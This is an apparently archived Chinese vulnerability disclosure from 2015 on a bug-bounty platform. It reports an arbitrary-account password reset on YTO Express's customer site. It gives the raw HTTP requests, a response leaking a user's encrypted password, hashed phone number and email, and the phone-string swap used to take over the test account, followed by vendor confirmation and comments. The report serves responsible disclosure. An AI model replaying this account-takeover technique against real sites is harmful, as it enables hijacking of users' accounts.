2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-14: 厂商已经确认,细节仅向厂商公开 2015-07-24: 细节向核心白帽子及相关领域专家公开 2015-08-03: 细节向普通白帽子公开 2015-08-13: 细节向实习白帽子公开 2015-08-28: 细节向公众公开
快递安全之圆通任意用户密码重置(非爆破)
1、正常的密码找回流程, 如下
POST /validUserByUserName.action HTTP/1.1Host: ec.yto.net.cnProxy-Connection: keep-aliveContent-Length: 32Accept: application/json, text/javascript, */*; q=0.01Origin: http://ec.yto.net.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://ec.yto.net.cn/forgetPassword.actionAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=3BC2D0C5FF34B19E74A9CC792DE1FA91; CNZZDATA1253325994=77630497-1436747644-http%253A%252F%252Fec.yto.net.cn%252F%7C1436753071userName=harbour&verityCode=3507
返回信息如下, 存在信息泄漏的问题(手机号、用户名、邮箱等信息,虽然加密, 但可能被利用,厂商注意)
HTTP/1.1 200 OKServer: Apache-Coyote/1.1Content-Type: text/javascript;charset=UTF-8Content-Language: zh-CNContent-Length: 1142Date: Mon, 13 Jul 2015 02:54:11 GMT{"User":{"deptName":"","canceled":"","isPrint":"","loginTime":null,"remark":"","newPassword":"","userPassword":"0gOUwTRD7TnaXSB97e/Aeg==","hasOnbehalfChannel":false,"userType":"4","userContractList":[],"userState":"1","shopAccount":"","isSeal":"","bindedCustomerId":"","userLevel":"","userName":"harbour","addressProvince":"","appProvider":null,"addressCity":"","hasShpo":"","userCode":"","updateTime":null,"telAreaCode":"","cardType":"","taobaoEncodeKey":"","clientId":"","createUser":"","userThreadList":[],"mobilePhone":"2803c9f5bb0b84ca6ac5781643759a0a","telExtCode":"","shopName":"","userAuthority":"4","userNameText":"d6656d2b1cb23c6254c7d8d08aadee83","createTime":"2015-07-13 07:42:31","hrCanceled":"","sex":"","telCode":"","field003":"","field002":"","deptAddr":"","repeatNum":0,"unlikefreight":"","addressDistrict":"","userSource":"0","field001":"","canChangeToContract":"","cardNo":"","id":1686228,"parentId":"","printNav":"","childType":"","switchEccount":"0","siteName":"","dr":"","site":"","mail":"1207727511@qq.com","ids":[],"oldPassword":"","addressStreet":"","telePhone":"","deptPhone":"","financialManager":"","deptCode":""}}
看到这边, 预感会有问题, 于是测试了一下, 问题的确存在, 如下2、使用测试帐号, 发送请求
POST /validUserByUserName.action HTTP/1.1Host: ec.yto.net.cnProxy-Connection: keep-aliveContent-Length: 31Accept: application/json, text/javascript, */*; q=0.01Origin: http://ec.yto.net.cnX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://ec.yto.net.cn/forgetPassword.actionAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=3BC2D0C5FF34B19E74A9CC792DE1FA91; CNZZDATA1253325994=77630497-1436747644-http%253A%252F%252Fec.yto.net.cn%252F%7C1436753071userName=wooyun&verityCode=3507
2、得到返回信息后, 浏览器会再次发送修改手机号码的请求
3、此处的手机号码是加密的, 就算未能明白加密规则也无所谓,替换成上文正常测试的手机号的加密字符串
4、成功给我的手机发送短信, 并成功登录
已证明!
你们更专业!PS:邮箱部分似乎也有问题, 厂商自己检查一下吧
危害等级:中
漏洞Rank:5
确认时间:2015-07-14 09:41
非常感谢,我们已经在修复!
暂无
圆通貌似没有账号登入吧
现在的官网有的
5rank,好吧
@harbour_bin 圆通所有的洞都是5rank。。。
@lightless WooYun: 快递安全之圆通存在越权操作两处 这个10Rank不够到手的只有2
